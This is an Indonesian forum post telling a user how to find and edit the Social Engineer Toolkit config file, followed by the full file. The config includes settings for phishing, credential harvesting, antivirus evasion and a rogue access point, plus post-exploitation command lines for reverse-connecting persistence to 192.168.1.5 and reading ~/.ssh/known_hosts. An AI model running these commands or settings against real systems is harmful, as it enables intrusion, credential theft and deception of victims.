06-23-2012, 07:45 AM
cari dimana lokasi folder metasploitnya..
nanti baru edit di set_confignya
untuk set_config bisa di cari menggunakan locate set_config :p
nanti baru edit di set_confignya
Quote:##################################################################################################yang saya kasih tanda itu yg diedit dengan lokasi folder metasploit nya
##################################################################################################
## ##
## The following config file will allow you to customize settings within ##
## the Social Engineer Toolkit. The lines that do not have comment code ##
## ("#") are the fields you want to toy with. They are pretty easy to ##
## understand. ##
## ##
## The Metasploit path is the default path for where Metasploit is located. ##
## Metasploit is required for SET to function properly. ##
## ##
## The ETTERCAP function specifies if you want to use ARP Cache poisoning in ##
## conjunction with the web attacks, note that ARP Cache poisoning is only ##
## for internal subnets only and does not work against people on the internet. ##
## ##
## The SENDMAIL option allows you to spoof source IP addresses utilizing an ##
## application called SendMail. Sendmail is NOT installed by default on BackTrack5. ##
## To spoof email addresses when performing the mass email attacks, you must ##
## install Sendmail manually using: apt-get install sendmail ##
## ##
## Note that ETTERCAP and SENDMAIL flags only accept ON or OFF switches. ##
## ##
## Note that the Metasploit_PATH cannot have a / after the folder name. ##
## ##
## There are additional options, read the comments for additional descriptions. ##
## ##
##################################################################################################
##################################################################################################
#
# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/opt/metasploit-4.3.0/msf3 <-----
#
# THIS WILL TELL WHAT DATABASE TO USE WHEN USING THE METASPLOIT FUNCTIONALITY. DEFAULT IS POSTGRESQL
METASPLOIT_DATABASE=postgresql
#
# HOW MANY TIMES SET SHOULD ENCODE A PAYLOAD IF YOU ARE USING STANDARD METASPLOIT ENCODING OPTIONS
ENCOUNT=4
#
# IF THIS OPTION IS SET, THE METASPLOIT PAYLOADS WILL AUTOMATICALLY MIGRATE TO
# NOTEPAD ONCE THE APPLET IS EXECUTED. THIS IS BENEFICIAL IF THE VICTIM CLOSES
# THE BROWSER HOWEVER CAN INTRODUCE BUGGY RESULTS WHEN AUTO MIGRATING.
AUTO_MIGRATE=OFF
#
# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV
# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE
# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
CUSTOM_EXE=legit.binary
#
# THIS IS FOR THE BACKDOORED EXECUTABLE IF YOU WANT TO KEEP THE EXECUTABLE TO STILL WORK. NORMALLY
# WHEN legit.binary IS USED, IT WILL RENDER THE APPLICATION USELESS. SPECIFYING THIS WILL KEEP THE
# APPLICATION WORKING
BACKDOOR_EXECUTION=ON
#
# HERE WE CAN RUN MULTIPLE METERPRETER SCRIPTS ONCE A SESSION IS ACTIVE. THIS
# MAY BE IMPORTANT IF WE ARE SLEEPING AND NEED TO RUN PERSISTENCE, TRY TO ELEVATE
# PERMISSIONS AND OTHER TASKS IN AN AUTOMATED FASHION. FIRST TURN THIS TRIGGER ON
# THEN CONFIGURE THE FLAGS. NOTE THAT YOU NEED TO SEPERATE THE COMMANDS BY A ;
METERPRETER_MULTI_SCRIPT=OFF
LINUX_METERPRETER_MULTI_SCRIPT=OFF
#
# WHAT COMMANDS DO YOU WANT TO RUN ONCE A METERPRETER SESSION HAS BEEN ESTABLISHED.
# BE SURE IF YOU WANT MULTIPLE COMMANDS TO SEPERATE WITH A ;. FOR EXAMPLE YOU COULD DO
# run getsystem;run hashdump;run persistence TO RUN THREE DIFFERENT COMMANDS
METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts
#
# THIS IS THE PORT THAT IS USED FOR THE IFRAME INJECTION USING THE METASPLOIT BROWSER ATTACKS
# BY DEFAULT THIS PORT IS 8080 HOWEVER EGRESS FILTERING MAY BLOCK THIS. MAY WANT TO ADJUST TO
# SOMETHING LIKE 21 OR 53
METASPLOIT_IFRAME_PORT=8080
#
# DEFINE TO USE ETTERCAP OR NOT WHEN USING WEBSITE ATTACK ONLY SET TO ON AND OFF
ETTERCAP=OFF
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap
#
# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP OR DSNIFF TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_DSNIFF_INTERFACE=eth0
#
# DEFINE TO USE DSNIFF OR NOT WHEN USING WEBSITE ATTACK ONLY SET TO ON AND OFF
# IF DSNIFF IS SET TO ON, ETTERCAP WILL AUTOMATICALLY BE DISABLED.
DSNIFF=OFF
#
# AUTO DETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON
#
# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF
#
# EMAIL PROVIDER LIST SUPPORTS GMAIL, HOTMAIL, AND YAHOO. SIMPLY CHANGE THE IT TO THE PROVIDER YOU WANT TO
# USE.
EMAIL_PROVIDER=GMAIL
#
# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
WEBATTACK_EMAIL=OFF
#
# MAN LEFT IN THE MIDDLE PORT, THIS WILL BE USED FOR THE WEB SERVER BIND PORT
MLITM_PORT=80
#
# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www
#
# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK
# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80. THIS ALSO GOES IF YOU ARE USING APACHE_SERVER EQUAL ON.
# YOU NEED TO SPECIFY WHAT PORT APACHE IS LISTENING ON IN ORDER FOR THIS TO WORK PROPERLY.
WEB_PORT=80
#
# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
# INSTALL ---> JAVA 6 JDK, BT5 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF
#
# THIS FLAG WILL SET THE JAVA ID FLAG WITHIN THE JAVA APPLET TO SOMETHING DIFFERENT.
# THIS COULD BE TO MAKE IT LOOK MORE BELIEVABLE OR FOR BETTER OBFUSCATION
JAVA_ID_PARAM=Secure Java Applet
#
# JAVA APPLET REPEATER OPTION WILL CONTINUE TO PROMPT THE USER WITH THE JAVA APPLET IF
# THE USER HITS CANCEL. THIS MEANS IT WILL BE NON STOP UNTIL RUN IS EXECUTED. THIS GIVES
# A BETTER SUCCESS RATE FOR THE JAVA APPLET ATTACK
JAVA_REPEATER=ON
#
# JAVA REPEATER TIMING WHICH IS THE DELAY IT TAKES BETWEEN THE USER HITTING CANCEL TO
# WHEN THE NEXT JAVA APPLET RUNS. BE CAREFUL SETTING TO LOW AS IT WILL SPAWM THEM OVER
# AND OVER EVEN IF THEY HIT RUN. 200 EQUALS 2 SECONDS.
JAVA_TIME=200
#
# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
#
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED! TO TURN THIS ON TURN SELF_SIGNED_CERT
# TO THE ON POSITION.
#
SELF_SIGNED_CERT=OFF
#
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem
#
# TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW
# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
WEBJACKING_TIME=2000
#
# COMMAND CENTER INTERFACE TO BIND TO BY DEFAULT IT IS LOCALHOST ONLY. IF YOU WANT TO ENABLE IT
# SO YOU CAN HIT THE COMMAND CENTER REMOTELY PUT THE INTERFACE TO 0.0.0.0 TO BIND TO ALL INTERFACES.
COMMAND_CENTER_INTERFACE=127.0.0.1
#
# PORT FOR THE COMMAND CENTER
COMMAND_CENTER_PORT=44444
#
# THIS WILL REMOVE THE SET INTERACTIVE SHELL FROM THE MENU SELECTION. THE SET PAYLOADS ARE LARGE IN NATURE
# AND THINGS LIKE THE PWNIEXPRESS NEED SMALLER SET BUILDS
SET_INTERACTIVE_SHELL=ON
#
# WHAT DO YOU WANT TO USE FOR YOUR DEFAULT TERMINAL WITHIN THE COMMAND CENTER. THE DEFAULT IS XTERM
# THE OPTIONS YOU HAVE ARE AS FOLLOW - GNOME, KONSOLE, XTERM, SOLO. IF YOU SELECT SOLO IT WILL PLACE
# ALL RESULTS IN THE SAME SHELL YOU USED TO OPEN THE SET-WEB INTERFACE. THIS IS USEFUL IF YOUR USING
# SOMETHING THAT ONLY HAS ONE CONSOLE, LETS SAY A IPHONE OR IPAD.
TERMINAL=SOLO
#
# DIGITAL SIGNATURE STEALING METHOD MUST HAVE THE PEFILE PYTHON MODULES LOADED
# FROM http://code.google.com/p/pefile/. BE SURE TO INSTALL THIS BEFORE TURNING
# THIS FLAG ON!!! THIS FLAG GIVES MUCH BETTER AV DETECTION
DIGITAL_SIGNATURE_STEAL=ON
#
# THESE TWO OPTIONS WILL TURN THE UPX PACKER TO ON AND AUTOMATICALLY ATTEMPT
# TO PACK THE EXECUTABLE WHICH MAY EVADE ANTI-VIRUS A LITTLE BETTER.
UPX_ENCODE=ON
UPX_PATH=/usr/bin/upx
#
# THIS FEATURE WILL TURN ON OR OFF THE AUTOMATIC REDIRECTION. BY DEFAULT FOR EXAMPLE IN MULTI-ATTACK
# THE SITE WILL REDIRECT ONCE ONE SUCCESSFUL ATTACK IS USED. SOME PEOPLE MAY WANT TO USE JAVA APPLET
# AND CREDENTIAL HARVESTER FOR EXAMPLE.
AUTO_REDIRECT=ON
#
# THIS WILL REDIRECT THE HARVESTER VICTIM TO THIS WEBSITE ONCE EXECUTED AND NOT TO THE ORIGINAL WEBSITE.
# FOR EXAMPLE IF YOU CLONE ABCOMPANY.COM AND BELOW IT SAYS BLAHBLAHCOMPANY.COM, IT WILL REDIRECT THERE INSTEAD.
# THIS IS USEFUL IF YOU WANT TO REDIRECT THE VICTIM TO AN ADDITIONAL SITE AFTER HARVESTER HAS TAKEN THE CREDENTIALS.
# SIMPLY TURN HARVESTER REDIRECT TO ON THEN ENTER HTTP://WEBSITEOFYOURCHOOSING.COM IN THE HARVESTER URL BELOW
# TO CHANGE.
HARVESTER_REDIRECT=OFF
#
HARVESTER_URL=http://thishasnotbeenset
#
# THIS FEATURE WILL AUTO EMBED A IMG SRC TAG TO A UNC PATH OF YOUR ATTACK MACHINE.
# USEFUL IF YOU WANT TO INTERCEPT THE HALF LM KEYS WITH RAINBOWTABLES. WHAT WILL HAPPEN
# IS AS SOON AS THE VICTIM CLICKS THE WEB-PAGE LINK, A UNC PATH WILL BE INITIATED
# AND THE METASPLOIT CAPTURE/SMB MODULE WILL INTERCEPT THE HASH VALUES.
UNC_EMBED=OFF
#
# THIS FEATURE WILL ATTEMPT TO TURN CREATE A ROGUE ACCESS POINT AND REDIRECT VICTIMS BACK TO THE
# SET WEB SERVER WHEN ASSOCIATED. AIRBASE-NG and DNSSPOOF.
ACCESS_POINT_SSID=linksys
AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng
DNSSPOOF_PATH=/usr/local/sbin/dnsspoof
#
# THIS WILL CONFIGURE THE DEFAULT CHANNEL THAT THE WIRELESS ACCESS POINT ATTACK BROADCASTS ON THROUGH WIFI
# COMMUNICATIONS.
AP_CHANNEL=9
#
# THIS WILL ENABLE THE POWERSHELL SHELLCODE INJECTION TECHNIQUE WITH EACH JAVA APPLET. IT WILL BE USED AS
# A SECOND FORM IN CASE THE FIRST METHOD FAILS. PLEASE NOTE THAT THIS IS EXTREMELY EXPERIMENTAL AT THIS
# POINT. IT IS NOT 100 PERCENT WORKING YET.
POWERSHELL_INJECTION=ON
#
# THIS WILL DISPLAY THE OUTPUT OF THE POWERSHELL INJECTION ATTACK SO YOU CAN SEE WHAT IS BEING PLACED ON THE
# SYSTEM.
POWERSHELL_VERBOSE=OFF
#
# THIS WILL PROFILE THE VICTIM MACHINE AND CHECK FOR INSTALLED VERSIONS AND REPORT BACK ON THEM
# NOTE THIS IS CURRENTLY DISABLED. DEVELOPMENT IS UNDERWAY ON THIS FEATURE
WEB_PROFILER=OFF
#
# PORT NUMBERS FOR THE JAVA APPLET ATTACK LINUX/OSX ATTACKS, REVERSE PAYLOADS
OSX_REVERSE_PORT=8080
#
LINUX_REVERSE_PORT=8081
#
#
# USER AGENT STRING FOR WHEN USING ANYTHING THAT CLONES THE WEBSITE, THIS USER AGENT WILL BE USED
USER_AGENT_STRING=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
#
# THE WAY THE SET INTERACTIVE SHELL WORKS IS IT FIRST DEPLOYS A STAGER PAYLOAD THAT PULLS AN ADDITIONAL EXECUTABLE.
# THE DOWNLOADER IS CURRENTLY BEING PICKED UP BY A/V AND IS ACTUALLY SOMEWHAT HARD TO OBFSUCATE BECAUSE IT DOES
# SIMILAR CHARACTERISTICS OF A DOWNLOAD/EXEC. IF YOU TURN THIS FEATURE ON, SET WILL DOWNLOAD THE INTERACTIVE SHELL
# STRAIGHT WITHOUT USING THE STAGER. ONLY ISSUE WITH THIS IS THERE MAY BE A DELAY ON THE USER END HOWEVER STILL
# SHOULDN'T BE NOTICED
SET_SHELL_STAGER=OFF
#
# DISABLES AUTOMATIC LISTENER - TURN THIS OFF IF YOU DON'T WANT A METASPLOIT LISTENER IN THE BACKGROUND.
AUTOMATIC_LISTENER=ON
#
# THIS WILL DISABLE THE FUNCTIONALITY IF METASPLOIT IS NOT INSTALLED AND YOU JUST WANT TO USE SETOOLKIT OR RATTE FOR PAYLOADS
# OR THE OTHER ATTACK VECTORS.
METASPLOIT_MODE=ON
#
####################################################################################################
untuk set_config bisa di cari menggunakan locate set_config :p
Every Second, Every Minutes, Every Hours, Every Days Its Never End